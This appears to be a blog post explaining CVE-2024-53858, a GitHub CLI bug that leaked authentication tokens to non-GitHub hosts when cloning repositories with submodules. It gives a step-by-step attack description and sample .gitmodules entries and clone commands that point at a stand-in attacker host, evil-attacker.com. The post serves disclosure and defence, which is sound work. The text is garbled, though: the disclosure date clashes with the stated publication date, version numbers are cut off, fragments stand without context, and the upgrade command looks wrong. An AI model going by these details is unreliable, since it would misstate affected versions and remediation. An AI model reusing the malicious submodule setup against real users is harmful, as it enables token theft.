CVE-2024-53858 - GitHub CLI Token Leak When Cloning Submodules – What You Need to Know

The GitHub CLI (gh) is GitHub’s official command-line tool, loved by many developers for simplifying GitHub workflows right from the terminal. In June 2024, a serious security issue was disclosed—CVE-2024-53858. This vulnerability can expose your authentication tokens to unauthorized parties if you aren't careful, but with the right knowledge and swift action, you can protect your repositories and your credentials.

This post will explain the vulnerability in plain English, show you how the exploit works, include original references, and most importantly, guide you on how to stay safe.

📢 What is CVE-2024-53858?

Put simply: Using the GitHub CLI to clone repos with certain submodules could leak your authentication tokens to servers outside of GitHub! A malicious actor with control of a submodule’s external host could steal your tokens, leading to hijacked accounts or worse.

Let's break it down

- Some gh commands help you clone repositories that include git submodules—these are nested repositories that can come from anywhere, not just GitHub.com.
- Before version 2.63., GitHub CLI would send your authentication tokens to any git host when handling submodules, not just github.com or ghe.com.
- These tokens could be read from several different environment variables, depending on conditions like whether you’re in Codespaces.

gh pr checkout

If you run any of these on a repository containing submodules hosted outside GitHub.com or GitHub Enterprise Server (ghe.com), your authentication tokens could leak.

Here’s a step-by-step of how an attacker could exploit this vulnerability

1. Malicious Submodule Setup: An attacker puts a submodule in a repository pointing to a git server they control (like evil-attacker.com/repo.git).
2. Cloning Using gh: You clone the main repo using gh repo clone <main-repo> (or use gh repo fork or gh pr checkout).
3. gh Acts as Credential Helper: The CLI, acting as a credential.helper, is tricked into providing one of your stored tokens to _any_ git host it encounters—including the attacker's server.
4. Token Sent with Clone: When git tries to fetch the submodule, it asks gh for credentials, and the CLI provides your token.
5. Attacker Steals Token: The attacker’s server logs the request, capturing your authentication token, which could grant access to your GitHub/Enterprise resources.

Here’s simplified pseudo-code showing how the leak happens

# Cloning repo with malicious submodule
gh repo clone https://github.com/victim/project.git

# .gitmodules file inside project.git contains:
[submodule "malicious"]
    path = evil
    url = https://evil-attacker.com/malicious.git

# When submodules are initialized:
git submodule update --init --recursive

# gh provides tokens for any host, not just github.com—up to version 2.62.x!

Suppose the .gitmodules file looks like this

[submodule "backdoor"]
    path = backdoor
    url = https://evil-attacker.com/hijack.git

If you or your automation scripts run

gh repo clone https://github.com/someuser/goodrepo.git
cd goodrepo
git submodule update --init --recursive

Your GITHUB_TOKEN or GH_ENTERPRISE_TOKEN could be sent silently to evil-attacker.com!

If none above, fallback to host-specific stored tokens.

ALL of the above could be handed to malicious servers if targeted by a submodule.

gh only acts as a credential helper for github.com and ghe.com.

- GITHUB_TOKEN will only be used for github.com/ghe.com. Not for arbitrary submodule hosts.

🔗 References

- GitHub Security Advisory: CVE-2024-53858
- GitHub CLI v2.63. Release Notes
- CLI Source Code Patch

gh extension upgrade gh

# Or download a fresh binary: https://github.com/cli/cli/releases

Revoke Old Tokens

- Visit GitHub tokens in your account.

Delete all tokens used with GitHub CLI before upgrade.

- For enterprises: audit Admin security log.

Educate Your Team & Automation

- Share this info with your team. Update CI/CD images and scripts that use the gh CLI.

Be Extremely Careful with Untrusted Repositories

- Malicious repositories (especially forks or public projects) can weaponize submodules to leak your tokens.

🗣️ FINAL WORD

CVE-2024-53858 is a textbook example of why token management and careful tool usage matters in the open-source world. The fix is out and simple—update your GitHub CLI! Token leaks can lead to account or org compromise, so take action now: update, revoke, and audit.

For more details

- GitHub Security Advisory: CVE-2024-53858
- GitHub CLI v2.63. Release Notes

Timeline

Published on: 11/27/2024 22:15:05 UTC